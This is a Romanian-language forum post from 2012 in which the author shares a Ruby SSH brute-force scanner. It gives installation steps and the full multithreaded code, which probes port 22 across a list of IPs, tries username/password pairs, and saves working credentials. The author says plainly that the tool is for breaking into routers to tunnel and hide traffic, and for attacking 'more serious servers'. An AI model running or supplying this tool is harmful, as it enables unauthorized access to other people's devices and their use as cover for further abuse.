mindark Posted October 20, 2012 Report Posted October 20, 2012 (edited) Un bruteforce de ssh facut de mine in ruby, l-am testat pe masina virtuala pe un Intel core i5-750, da la 100 incercari/s. Ideal pentru a gasi vreun router, ca sa faceti ssh tunel si sa ascundeti traficul sub ssl, dar deasemenea il puteti folosi pentru a scana servere mai serioase.Pentru a rula programul instala?i Oracle JDK, si jruby ultimele versiuni pentru threaduri reale, nu green. Apoi din jruby/bin ii dati:gem install colorizegem install net-sshIata si codul la program. Curind voi posta un checker, care va sorta rezultatele la servere/routere.require 'rubygems'require 'net/ssh'require 'colorize'require 'thread'require 'socket'require 'timeout'def port_open?(ip, port, seconds=1) Timeout::timeout(seconds) do TCPSocket.new(ip, port).close return true endrescue Exception => e return falseendif ARGV.length!=4 then abort('ruby scan.rb <ips> <users> <threads> <goods>')endips, users, num_threads, routers = open(ARGV[0]).map{|line| line.gsub("\n", '')}, open(ARGV[1]).map{|line| line.gsub("\n", '')}, ARGV[2].to_i, File.new(ARGV[3], 'w')threads = []scanned = 0lock = Mutex.newnum_threads.times do threads<<Thread.new do while ips.length>0 ip = '' lock.synchronize {ip = ips.pop} next if !port_open?(ip, 22) users.each do |user| begin username = user.split("/")[0] password = user.split("/")[1] scanned += 1 lock.synchronize{puts "#{scanned} tries, #{ips.length} remaining: trying #{ip} with user: #{username} and pass: #{password}".green} Timeout::timeout(5) do Net::SSH.start(ip, username, :password => password) do |ssh| puts "#{scanned}: found router #{ip}".red routers.write("#{ip}:#{username}:#{password}\n") routers.flush end end break rescue Exception => e end end end endendthreads.each{|th| th.join} Edited October 21, 2012 by mindark Quote